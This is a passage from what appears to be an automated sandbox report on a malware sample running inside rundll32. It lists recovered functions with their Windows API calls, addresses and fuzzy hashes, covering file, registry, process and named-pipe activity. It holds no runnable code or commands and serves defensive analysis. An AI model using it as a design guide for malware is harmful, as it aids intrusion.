                                                          • String ID:
                                                          • API String ID: 972889839-0
                                                          • Opcode ID: e1775794176943d5456a7f1d4c9e1545ec04d9b9a53ff24f53006d4bd0cbc4cb
                                                          • Instruction ID: 509e7b64d7c749a66dc250e9a240490833cf864521a45440359d6da8d41a31ac
                                                          • Opcode Fuzzy Hash: e1775794176943d5456a7f1d4c9e1545ec04d9b9a53ff24f53006d4bd0cbc4cb
                                                          • Instruction Fuzzy Hash: FDA18C71500209EFCB15DFA9DC89E9A3BE8FF09316F184925F908E7261D7319918DBA1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 05582546, Relevance: 24.3, APIs: 16, Instructions: 258memorystringfileCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • lstrlenW.KERNEL32(?), ref: 0558255B
                                                            • Part of subcall function 055714A0: lstrlenW.KERNEL32(?,?,00000000,?,00000250,?,77A31120), ref: 055714EC
                                                            • Part of subcall function 055714A0: lstrlenW.KERNEL32(?,?,77A31120), ref: 055714F8
                                                            • Part of subcall function 055714A0: memset.NTDLL ref: 05571540
                                                            • Part of subcall function 055714A0: FindFirstFileW.KERNEL32(00000000,00000000), ref: 0557155B
                                                            • Part of subcall function 055714A0: lstrlenW.KERNEL32(0000002C), ref: 05571593
                                                            • Part of subcall function 055714A0: lstrlenW.KERNEL32(?), ref: 0557159B
                                                            • Part of subcall function 055714A0: memset.NTDLL ref: 055715BE
                                                            • Part of subcall function 055714A0: wcscpy.NTDLL ref: 055715D0
                                                            • Part of subcall function 055714A0: PathFindFileNameW.SHLWAPI(0000001C,?,?,?,?,00000000), ref: 055715F6
                                                            • Part of subcall function 055714A0: RtlEnterCriticalSection.NTDLL(?), ref: 0557162B
                                                            • Part of subcall function 055714A0: RtlLeaveCriticalSection.NTDLL(?), ref: 05571647
                                                            • Part of subcall function 055714A0: FindNextFileW.KERNEL32(?,00000000), ref: 05571660
                                                            • Part of subcall function 055714A0: WaitForSingleObject.KERNEL32(00000000), ref: 05571672
                                                            • Part of subcall function 055714A0: FindClose.KERNEL32(?), ref: 05571687
                                                            • Part of subcall function 055714A0: FindFirstFileW.KERNEL32(00000000,00000000), ref: 0557169B
                                                            • Part of subcall function 055714A0: lstrlenW.KERNEL32(0000002C), ref: 055716BD
                                                          • RtlAllocateHeap.NTDLL(00000000,00000036,?), ref: 055825B7
                                                          • memcpy.NTDLL(00000000,?,00000000), ref: 055825CA
                                                          • lstrcpyW.KERNEL32(00000000,?), ref: 055825E1
                                                            • Part of subcall function 055714A0: FindNextFileW.KERNEL32(?,00000000), ref: 05571733
                                                            • Part of subcall function 055714A0: WaitForSingleObject.KERNEL32(00000000), ref: 05571745
                                                            • Part of subcall function 055714A0: FindClose.KERNEL32(?), ref: 05571760
                                                          • HeapFree.KERNEL32(00000000,00000000,00000000,?,?,00000000,00000000,00000010), ref: 0558260C
                                                          • RtlAllocateHeap.NTDLL(00000000,0000020C), ref: 05582624
                                                          • HeapFree.KERNEL32(00000000,00000000), ref: 0558267E
                                                          • lstrlenW.KERNEL32(00000000,?), ref: 055826A1
                                                          • RtlAllocateHeap.NTDLL(00000000,?), ref: 055826B3
                                                          • HeapFree.KERNEL32(00000000,00000000,00000000,?,?,00000000,00000000,00000014), ref: 05582727
                                                          • HeapFree.KERNEL32(00000000,?), ref: 05582737
                                                            • Part of subcall function 0558F274: lstrlen.KERNEL32(00000000,00000008,00000000,?,00000000,0558974F,00000000,00000000,00000000,05593D7C,00000000,00000000,00000006), ref: 0558F283
                                                            • Part of subcall function 0558F274: mbstowcs.NTDLL ref: 0558F29F
                                                          • CreateDirectoryW.KERNEL32(00000000,00000000,?), ref: 05582760
                                                          • lstrlenW.KERNEL32(0559D8B0,?), ref: 055827DA
                                                          • DeleteFileW.KERNEL32(?,?), ref: 05582808
                                                          • HeapFree.KERNEL32(00000000,?), ref: 05582816
                                                          • HeapFree.KERNEL32(00000000,?), ref: 05582837
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.743135390.0000000005570000.00000040.00020000.sdmp, Offset: 05570000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_5570000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: Heaplstrlen$Find$FileFree$Allocate$CloseCriticalFirstNextObjectSectionSingleWaitmemset$CreateDeleteDirectoryEnterLeaveNamePathlstrcpymbstowcsmemcpywcscpy
                                                          • String ID:
                                                          • API String ID: 72361108-0
                                                          • Opcode ID: ae2e17b0d4bb457bb38fe8bd4654a4e8d23c0d9d4b4bc9d4a7c18dfd034d23cd
                                                          • Instruction ID: ca93e5b53e054e7c2419d6869d1520f8d4a1a5a698ecaf2daefe48428b005743
                                                          • Opcode Fuzzy Hash: ae2e17b0d4bb457bb38fe8bd4654a4e8d23c0d9d4b4bc9d4a7c18dfd034d23cd
                                                          • Instruction Fuzzy Hash: 81916C7591021AEFDB10EFA6ECC9DEA7FBCFB09354B064412F505D7111DA38A948EBA0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 05592C8D, Relevance: 24.1, APIs: 16, Instructions: 131memoryregistrythreadCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • RegOpenKeyA.ADVAPI32(80000001,?,?), ref: 05592CAF
                                                          • RtlEnterCriticalSection.NTDLL(00000000), ref: 05592CCC
                                                          • CloseHandle.KERNEL32(?,?,?,?,00000000), ref: 05592D1C
                                                          • DeleteFileW.KERNEL32(00000000,?,?,?,00000000), ref: 05592D26
                                                          • GetLastError.KERNEL32 ref: 05592D30
                                                          • HeapFree.KERNEL32(00000000,00000000), ref: 05592D41
                                                          • HeapFree.KERNEL32(00000000,?,?,?,?,00000000), ref: 05592D63
                                                          • HeapFree.KERNEL32(00000000,?), ref: 05592D9A
                                                          • RtlLeaveCriticalSection.NTDLL(00000000), ref: 05592DAE
                                                          • RegCloseKey.ADVAPI32(?,?,?,00000000), ref: 05592DB7
                                                          • SuspendThread.KERNEL32(?), ref: 05592DC6
                                                          • CreateEventA.KERNEL32(0559C1A8,00000001,00000000), ref: 05592DDA
                                                          • SetEvent.KERNEL32(00000000), ref: 05592DE7
                                                          • CloseHandle.KERNEL32(00000000), ref: 05592DEE
                                                          • Sleep.KERNEL32(000001F4), ref: 05592E01
                                                          • ResumeThread.KERNEL32(?), ref: 05592E25
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.743135390.0000000005570000.00000040.00020000.sdmp, Offset: 05570000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_5570000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: CloseFreeHeap$CriticalEventHandleSectionThread$CreateDeleteEnterErrorFileLastLeaveOpenResumeSleepSuspend
                                                          • String ID:
                                                          • API String ID: 1011176505-0
                                                          • Opcode ID: 62336850fc29d834e30d0637e02001e60d9926e2fa54558f86cffb8f0bba5752
                                                          • Instruction ID: 2b036b3b77256ec97e7af45c52cb70c3b8eebc96b6b816e32df7308db14d8aaf
                                                          • Opcode Fuzzy Hash: 62336850fc29d834e30d0637e02001e60d9926e2fa54558f86cffb8f0bba5752
                                                          • Instruction Fuzzy Hash: 77415D76910209FFDF149FA5E8CA9ADBFB9FB44345F06402AF502A2110CB39AD59EF50
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0558F5AE, Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 149stringCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 05585EA9: RtlAllocateHeap.NTDLL(00000000,?,05586423), ref: 05585EB5
                                                          • memset.NTDLL ref: 0558F5DC
                                                          • StrChrA.SHLWAPI(?,0000000D), ref: 0558F622
                                                          • StrChrA.SHLWAPI(?,0000000A), ref: 0558F62F
                                                          • StrChrA.SHLWAPI(?,0000007C), ref: 0558F656
                                                          • StrTrimA.SHLWAPI(?,0559847C), ref: 0558F66B
                                                          • StrChrA.SHLWAPI(?,0000003D), ref: 0558F674
                                                          • StrTrimA.SHLWAPI(00000001,0559847C), ref: 0558F68A
                                                          • _strupr.NTDLL ref: 0558F691
                                                          • StrTrimA.SHLWAPI(?,?), ref: 0558F69E
                                                          • memcpy.NTDLL(00000000,00000000,-00000008,-00000020,00000000,-00000020), ref: 0558F6E6
                                                          • lstrlen.KERNEL32(?,00000000,?,?,?,00000001,?,00000000,?), ref: 0558F705
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.743135390.0000000005570000.00000040.00020000.sdmp, Offset: 05570000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_5570000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: Trim$AllocateHeap_struprlstrlenmemcpymemset
                                                          • String ID: $;
                                                          • API String ID: 4019332941-73438061
                                                          • Opcode ID: 8c5d6595c225353448fd5ea220da7f543a13a98d4437dac21bc8d2852b8b9419
                                                          • Instruction ID: 5025704814a00d563f14acaae3d7d0cbbc5b0a26781426ff85abf2ffddf8c6aa
                                                          • Opcode Fuzzy Hash: 8c5d6595c225353448fd5ea220da7f543a13a98d4437dac21bc8d2852b8b9419
                                                          • Instruction Fuzzy Hash: CC41C571608306AFE721EF299C45B3BBBE8FF99600F44081AF486E7251EB74D509CB61
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 05586CA6, Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 121processstringCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • memset.NTDLL ref: 05586CBB
                                                            • Part of subcall function 0558F274: lstrlen.KERNEL32(00000000,00000008,00000000,?,00000000,0558974F,00000000,00000000,00000000,05593D7C,00000000,00000000,00000006), ref: 0558F283
                                                            • Part of subcall function 0558F274: mbstowcs.NTDLL ref: 0558F29F
                                                          • lstrlenW.KERNEL32(00000000,00000000,00000000,77A2DBB0,00000020,00000000), ref: 05586CF4
                                                          • wcstombs.NTDLL ref: 05586CFE
                                                          • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,0C000000,00000000,00000000,00000044,?,00000000,77A2DBB0,00000020,00000000), ref: 05586D2F
                                                          • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,0557DDD2), ref: 05586D5B
                                                          • TerminateProcess.KERNEL32(?,000003E5), ref: 05586D71
                                                          • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,0557DDD2), ref: 05586D85
                                                          • GetLastError.KERNEL32 ref: 05586D89
                                                          • GetExitCodeProcess.KERNEL32(?,00000001), ref: 05586DA9
                                                          • CloseHandle.KERNEL32(?), ref: 05586DB8
                                                          • CloseHandle.KERNEL32(?), ref: 05586DBD
                                                          • GetLastError.KERNEL32 ref: 05586DC1
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.743135390.0000000005570000.00000040.00020000.sdmp, Offset: 05570000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_5570000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: Process$CloseErrorHandleLastMultipleObjectsWaitlstrlen$CodeCreateExitTerminatembstowcsmemsetwcstombs
                                                          • String ID: D
                                                          • API String ID: 2463014471-2746444292
                                                          • Opcode ID: dc022922dba064e41603a5e6c656f49717593e067701e56086b7cbfde9282022
                                                          • Instruction ID: 38ca01ca524bec910b660947a2ae03e702d6b9c7f428e76e652f7fb9c3ad02ba
                                                          • Opcode Fuzzy Hash: dc022922dba064e41603a5e6c656f49717593e067701e56086b7cbfde9282022
                                                          • Instruction Fuzzy Hash: 234125B5901128FFDF01EFA4CD899BEBBB9FB18340F25446AF502B7210DA355E089B61
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 05578C9D, Relevance: 21.2, APIs: 14, Instructions: 230memorystringCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 055750C7: RegQueryValueExA.KERNEL32(00000000,055729E6,00000000,055729E6,00000000,?,?,00000000,00000000,?,?,055729E6,055729E6,?,05588593,?), ref: 055750FF
                                                            • Part of subcall function 055750C7: RtlAllocateHeap.NTDLL(00000000,?), ref: 05575113
                                                            • Part of subcall function 055750C7: RegQueryValueExA.ADVAPI32(00000000,055729E6,00000000,055729E6,00000000,?,?,00000000,00000000,?,?,055729E6,055729E6,?,05588593,?), ref: 0557512D
                                                            • Part of subcall function 055750C7: RegCloseKey.ADVAPI32(00000000,?,00000000,00000000,?,?,055729E6,055729E6,?,05588593,?,055729E6,00000000), ref: 05575157
                                                          • HeapFree.KERNEL32(00000000,?,?,?,?), ref: 05578CE4
                                                          • RtlAllocateHeap.NTDLL(00000000,00010000,?), ref: 05578D02
                                                          • HeapFree.KERNEL32(00000000,00000000,00000029,00000000,00000000,?), ref: 05578D30
                                                          • HeapFree.KERNEL32(00000000,055963D8,0000002A,00000000,00000000,00000000,00000000,?,00000001,055963D8,00000002,?,?), ref: 05578DA4
                                                          • RtlAllocateHeap.NTDLL(00000000,00000400,?), ref: 05578E67
                                                          • wsprintfA.USER32 ref: 05578E82
                                                          • lstrlen.KERNEL32(00000000,00000000), ref: 05578E8D
                                                          • HeapFree.KERNEL32(00000000,00000000,0000001C,00000000,00000000), ref: 05578EA4
                                                          • HeapFree.KERNEL32(00000000,?,?,?,00000008,0000000B,?,?,?,00000001,00000000,?,00000001,055963D8,00000002,?), ref: 05578EC6
                                                          • RtlAllocateHeap.NTDLL(00000000,00000400,?), ref: 05578EE1
                                                          • wsprintfA.USER32 ref: 05578EF8
                                                          • lstrlen.KERNEL32(00000000,00000000), ref: 05578F03
                                                            • Part of subcall function 05581486: lstrlen.KERNEL32(?,00000000,00000000,75145520,?,?,?,0557D50C,0000001C,00000000,00000000), ref: 055814B6
                                                            • Part of subcall function 05581486: RtlAllocateHeap.NTDLL(00000000,00000000,00000000), ref: 055814CC
                                                            • Part of subcall function 05581486: memcpy.NTDLL(00000010,?,00000000,?,?,?,0557D50C,0000001C), ref: 05581502
                                                            • Part of subcall function 05581486: memcpy.NTDLL(00000010,00000000,0557D50C,?,?,?,0557D50C), ref: 0558151D
                                                            • Part of subcall function 05581486: CallNamedPipeA.KERNEL32(00000000,00000000,?,00000010,00000028,00000001), ref: 0558153B
                                                            • Part of subcall function 05581486: GetLastError.KERNEL32(?,?,?,0557D50C), ref: 05581545
                                                            • Part of subcall function 05581486: HeapFree.KERNEL32(00000000,00000000,?,?,?,0557D50C), ref: 05581568
                                                          • HeapFree.KERNEL32(00000000,00000000,0000001C,00000000,00000000), ref: 05578F1A
                                                          • HeapFree.KERNEL32(00000000,?,?,00000001,00000000,?,00000001,055963D8,00000002,?,?), ref: 05578F2A
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.743135390.0000000005570000.00000040.00020000.sdmp, Offset: 05570000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_5570000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: Heap$Free$Allocate$lstrlen$QueryValuememcpywsprintf$CallCloseErrorLastNamedPipe
                                                          • String ID:
                                                          • API String ID: 3733591251-0
                                                          • Opcode ID: 093fe3ab1c3aad80f103451fe60105ad83339ae51301cc9c1304505943213b3a
                                                          • Instruction ID: 19c1b9cd57008e27f70d70f84ff6034a340d4b8ed71638f32e89323f4b6aeb1a
                                                          • Opcode Fuzzy Hash: 093fe3ab1c3aad80f103451fe60105ad83339ae51301cc9c1304505943213b3a
                                                          • Instruction Fuzzy Hash: 76819C71910119EFEB20AFA5EC89DBEBFB9FB48354B02052AF515A3250DB345E48DB60
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 05571826, Relevance: 21.2, APIs: 14, Instructions: 206memorystringthreadCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • StrChrA.SHLWAPI(?,0000002C), ref: 05571875
                                                          • StrTrimA.SHLWAPI(00000001,?), ref: 0557188E
                                                          • StrChrA.SHLWAPI(?,0000002C), ref: 05571899
                                                          • StrTrimA.SHLWAPI(00000001,?), ref: 055718B2
                                                          • lstrlen.KERNEL32(?,?,00000001,?,?), ref: 05571955
                                                          • RtlAllocateHeap.NTDLL(00000000,?,?), ref: 05571977
                                                          • lstrcpy.KERNEL32(00000020,?), ref: 05571996
                                                          • lstrlen.KERNEL32(?), ref: 055719A0
                                                          • memcpy.NTDLL(?,?,?), ref: 055719E1
                                                          • memcpy.NTDLL(?,?,?), ref: 055719F4
                                                          • SwitchToThread.KERNEL32(?,00000000,?,?), ref: 05571A18
                                                          • HeapFree.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,?), ref: 05571A3A
                                                          • HeapFree.KERNEL32(00000000,?,?,00000001,?,?), ref: 05571A60
                                                          • HeapFree.KERNEL32(00000000,00000001,?,00000001,?,?), ref: 05571A7C
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.743135390.0000000005570000.00000040.00020000.sdmp, Offset: 05570000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_5570000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: Heap$Free$Trimlstrlenmemcpy$AllocateSwitchThreadlstrcpy
                                                          • String ID:
                                                          • API String ID: 3323474148-0
                                                          • Opcode ID: f475d2cc40fa753e4485e8fcaa8beb556adea637d7897fcc64a3fefaca170905
                                                          • Instruction ID: 6b32a6e357e7789ad8d17efb94b14e353ce64edabbde924c1c863df6513e29ff
                                                          • Opcode Fuzzy Hash: f475d2cc40fa753e4485e8fcaa8beb556adea637d7897fcc64a3fefaca170905
                                                          • Instruction Fuzzy Hash: 5A719D31508706AFD720DF25E885A6BBBE9FF48314F05092EF59AD3250EB34E549CB92
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0557F254, Relevance: 21.2, APIs: 14, Instructions: 161memorystringfileCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • lstrlen.KERNEL32(?,?,00000000), ref: 0557F26B
                                                          • lstrlen.KERNEL32(?,?,00000000), ref: 0557F272
                                                          • RtlAllocateHeap.NTDLL(00000000,?), ref: 0557F289
                                                          • lstrcpy.KERNEL32(00000000,?), ref: 0557F29A
                                                          • lstrcat.KERNEL32(?,?), ref: 0557F2B6
                                                          • lstrcat.KERNEL32(?,?), ref: 0557F2C7
                                                          • RtlAllocateHeap.NTDLL(00000000,?), ref: 0557F2D8
                                                          • RtlAllocateHeap.NTDLL(00000000,?), ref: 0557F375
                                                          • CreateFileA.KERNEL32(?,C0000000,00000000,00000000,00000004,00000080,00000000,?,00000000), ref: 0557F3AE
                                                          • WriteFile.KERNEL32(00000000,?,?,00000000,00000000,?,00000000), ref: 0557F3C7
                                                          • CloseHandle.KERNEL32(00000000,?,00000000), ref: 0557F3D1
                                                          • HeapFree.KERNEL32(00000000,?,?,00000000), ref: 0557F3E1
                                                          • HeapFree.KERNEL32(00000000,00000000,?,00000000), ref: 0557F3FA
                                                          • HeapFree.KERNEL32(00000000,?,?,00000000), ref: 0557F40A
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.743135390.0000000005570000.00000040.00020000.sdmp, Offset: 05570000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_5570000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: Heap$AllocateFree$Filelstrcatlstrlen$CloseCreateHandleWritelstrcpy
                                                          • String ID:
                                                          • API String ID: 333890978-0
                                                          • Opcode ID: 198947daaac42280399738892f2a11071c1b455494d7e6f581133f06cbfa251e
                                                          • Instruction ID: 3801f3c32fb1b024452ff40ad39e76a87945db4242673dcdcf45eda812d3dba2
                                                          • Opcode Fuzzy Hash: 198947daaac42280399738892f2a11071c1b455494d7e6f581133f06cbfa251e
                                                          • Instruction Fuzzy Hash: 11517672810109FFDB019FA5EC85CAE7BBDFF48354B068026F61693120DB389A49EF60
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 05586152, Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 128timeCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • wsprintfA.USER32 ref: 05586194
                                                          • OpenWaitableTimerA.KERNEL32(00100000,00000000,0557AA7A), ref: 055861A7
                                                          • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,0557AA7A,00000000,?), ref: 055862BF
                                                            • Part of subcall function 05585EA9: RtlAllocateHeap.NTDLL(00000000,?,05586423), ref: 05585EB5
                                                          • memset.NTDLL ref: 055861CA
                                                          • memcpy.NTDLL(?,000493E0,00000010,?,?,00000040,?,?,?,?,?,?,0557AA7A,00000000,?), ref: 05586249
                                                          • RtlEnterCriticalSection.NTDLL(?), ref: 0558625E
                                                          • RtlLeaveCriticalSection.NTDLL(?), ref: 05586276
                                                          • GetLastError.KERNEL32(05590D24,?,?,?,?,?,?,?,00000040,?,?,?,?,?,?,0557AA7A), ref: 0558628E
                                                          • RtlEnterCriticalSection.NTDLL(?), ref: 0558629A
                                                          • RtlLeaveCriticalSection.NTDLL(?), ref: 055862A9
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.743135390.0000000005570000.00000040.00020000.sdmp, Offset: 05570000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_5570000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: CriticalSection$EnterLeave$AllocateCloseErrorHandleHeapLastOpenTimerWaitablememcpymemsetwsprintf
                                                          • String ID: 0x%08X$W
                                                          • API String ID: 1559661116-2600449260
                                                          • Opcode ID: 7b0da85c7e2fc73ca5e4b567f4349b167d6826e7e966e09b42a1a6797a61cfaa
                                                          • Instruction ID: 15c99e6ae329bcc0a80be804151be50bc1c888abe3f4b67a41462c1adec8e662
                                                          • Opcode Fuzzy Hash: 7b0da85c7e2fc73ca5e4b567f4349b167d6826e7e966e09b42a1a6797a61cfaa
                                                          • Instruction Fuzzy Hash: 944181B1900209EFDB10EFA4D885AAEBFF8FF08354F10456AF64AE7240D7759A54DB90
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0557899F, Relevance: 21.1, APIs: 14, Instructions: 107libraryloaderstringCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • lstrlenW.KERNEL32(?,00000000,?,?,?,055815F2,?,?), ref: 055789AC
                                                            • Part of subcall function 05585EA9: RtlAllocateHeap.NTDLL(00000000,?,05586423), ref: 05585EB5
                                                          • GetCurrentDirectoryW.KERNEL32(00007FFF,00000000,00010012,?,?,?,055815F2,?,?), ref: 055789D5
                                                          • lstrcpyW.KERNEL32(-0000FFFE,?), ref: 055789F5
                                                          • lstrcpyW.KERNEL32(-00000002,?), ref: 05578A10
                                                          • SetCurrentDirectoryW.KERNEL32(?,?,?,?,055815F2,?,?), ref: 05578A1C
                                                          • LoadLibraryW.KERNEL32(-0000FFFE,?,?,?,055815F2,?,?), ref: 05578A1F
                                                          • SetCurrentDirectoryW.KERNEL32(00000000,?,?,?,055815F2,?,?), ref: 05578A2B
                                                          • GetProcAddress.KERNEL32(00000000,?), ref: 05578A48
                                                          • GetProcAddress.KERNEL32(00000000,?), ref: 05578A62
                                                          • GetProcAddress.KERNEL32(00000000,?), ref: 05578A78
                                                          • GetProcAddress.KERNEL32(00000000,?), ref: 05578A8E
                                                          • GetProcAddress.KERNEL32(00000000,?), ref: 05578AA4
                                                          • GetProcAddress.KERNEL32(00000000,?), ref: 05578ABA
                                                          • FreeLibrary.KERNEL32(00000000,?,?,?,055815F2,?,?), ref: 05578AE3
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.743135390.0000000005570000.00000040.00020000.sdmp, Offset: 05570000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_5570000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: AddressProc$CurrentDirectory$Librarylstrcpy$AllocateFreeHeapLoadlstrlen
                                                          • String ID:
                                                          • API String ID: 3772355505-0
                                                          • Opcode ID: 4cc7190ae3839a520bc83831d6fa86a117e0d8485f05a91e918f426dbefa71b8
                                                          • Instruction ID: 504ffa3cfb0efb7a2bcde39e6be967ea9f5f426be2237d9f341e5f86b8ba7d8c
                                                          • Opcode Fuzzy Hash: 4cc7190ae3839a520bc83831d6fa86a117e0d8485f05a91e918f426dbefa71b8
                                                          • Instruction Fuzzy Hash: 053148B251461AAFD710DF65EC8AD6B7FECFF04354B05452AB809C7611EB38E808EB64
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 05586AF0, Relevance: 21.1, APIs: 14, Instructions: 79stringmemoryfileCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • lstrlenW.KERNEL32(?,?,00000000,?,?,?,05582804,?,?,?), ref: 05586B07
                                                          • lstrlenW.KERNEL32(?,?,?,00000000,?,?,?,05582804,?,?,?), ref: 05586B12
                                                          • lstrlenW.KERNEL32(?,?,?,00000000,?,?,?,05582804,?,?,?), ref: 05586B1A
                                                          • RtlAllocateHeap.NTDLL(00000000,?), ref: 05586B2F
                                                          • lstrcpyW.KERNEL32(00000000,?), ref: 05586B40
                                                          • lstrcatW.KERNEL32(00000000,?), ref: 05586B52
                                                          • CreateDirectoryW.KERNEL32(00000000,00000000,?,?,00000000,?,?,?,05582804,?,?,?), ref: 05586B57
                                                          • lstrcatW.KERNEL32(00000000,055963D0), ref: 05586B63
                                                          • lstrcatW.KERNEL32(00000000), ref: 05586B6B
                                                          • CreateDirectoryW.KERNEL32(00000000,00000000,?,?,0000005C,?,?,00000000,?,?,?,05582804,?,?,?), ref: 05586B70
                                                          • lstrcatW.KERNEL32(00000000,055963D0), ref: 05586B7C
                                                          • lstrcatW.KERNEL32(00000000,00000002), ref: 05586B97
                                                          • CopyFileW.KERNEL32(?,00000000,00000000,?,?,0000005C,?,?,00000000,?,?,?,05582804,?,?,?), ref: 05586B9F
                                                          • HeapFree.KERNEL32(00000000,00000000,?,?,0000005C,?,?,00000000,?,?,?,05582804,?,?,?), ref: 05586BAD
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.743135390.0000000005570000.00000040.00020000.sdmp, Offset: 05570000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_5570000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: lstrcat$lstrlen$CreateDirectoryHeap$AllocateCopyFileFreelstrcpy
                                                          • String ID:
                                                          • API String ID: 3635185113-0
                                                          • Opcode ID: 2d687acf72e4cae8722bfb3bdbfcda4cb795f3f2547b4bb28a8e9424084b3961
                                                          • Instruction ID: 533aa7d6c4bc4231a435e70f6751bf32053b19202734459caf8d6f69ca2a11d0
                                                          • Opcode Fuzzy Hash: 2d687acf72e4cae8722bfb3bdbfcda4cb795f3f2547b4bb28a8e9424084b3961
                                                          • Instruction Fuzzy Hash: B721DE32114215BFD3226F64EC8AE7B7FACFF85B95F02001AF505A2150DF69E80DEA61
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 05572ED6, Relevance: 18.2, APIs: 12, Instructions: 196memorystringthreadCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 0558A442: RtlAllocateHeap.NTDLL(00000000,00000105), ref: 0558A487
                                                            • Part of subcall function 0558A442: RtlAllocateHeap.NTDLL(00000000,00000105), ref: 0558A49F
                                                            • Part of subcall function 0558A442: WaitForSingleObject.KERNEL32(00000000,?,00000000,?,?,?,?,?,05572EFF,0557B352,?,00000001), ref: 0558A567
                                                            • Part of subcall function 0558A442: HeapFree.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,05572EFF,0557B352,?,00000001), ref: 0558A590
                                                            • Part of subcall function 0558A442: HeapFree.KERNEL32(00000000,05572EFF,?,00000000,?,?,?,?,?,05572EFF,0557B352,?,00000001), ref: 0558A5A0
                                                            • Part of subcall function 0558A442: RegCloseKey.ADVAPI32(?,?,00000000,?,?,?,?,?,05572EFF,0557B352,?,00000001), ref: 0558A5A9
                                                          • lstrcmp.KERNEL32(?,?), ref: 05572F4D
                                                          • HeapFree.KERNEL32(00000000,?), ref: 05572F79
                                                          • GetCurrentThreadId.KERNEL32 ref: 0557302A
                                                          • GetCurrentThread.KERNEL32 ref: 0557303B
                                                          • HeapFree.KERNEL32(00000000,00000000,?,?,00000000,?,0557B352,?,00000001), ref: 05573078
                                                          • HeapFree.KERNEL32(00000000,?,?,?,00000000,?,0557B352,?,00000001), ref: 0557308C
                                                          • RtlAllocateHeap.NTDLL(00000000,00000400,?), ref: 0557309A
                                                          • wsprintfA.USER32 ref: 055730B2
                                                            • Part of subcall function 05589E0B: lstrlen.KERNEL32(00000000,00000000,00000000,00000008,05576149,00000000,00000000,00000000,75145520,00000000,?,0557D44F,00000020,00000000,?,00000000), ref: 05589E15
                                                            • Part of subcall function 05589E0B: lstrcpy.KERNEL32(00000000,00000000), ref: 05589E39
                                                            • Part of subcall function 05589E0B: StrRChrA.SHLWAPI(00000000,00000000,0000002E,?,00000003,?,0557D44F,00000020,00000000,?,00000000,?,00000000,00000000), ref: 05589E40
                                                            • Part of subcall function 05589E0B: lstrcat.KERNEL32(00000000,?), ref: 05589E97
                                                          • lstrlen.KERNEL32(00000000,00000000), ref: 055730BD
                                                          • HeapFree.KERNEL32(00000000,00000000,0000001C,00000000,00000000), ref: 055730D4
                                                          • HeapFree.KERNEL32(00000000,00000000), ref: 055730E5
                                                          • HeapFree.KERNEL32(00000000,?), ref: 055730F1
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.743135390.0000000005570000.00000040.00020000.sdmp, Offset: 05570000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_5570000_rundll32.jbxd
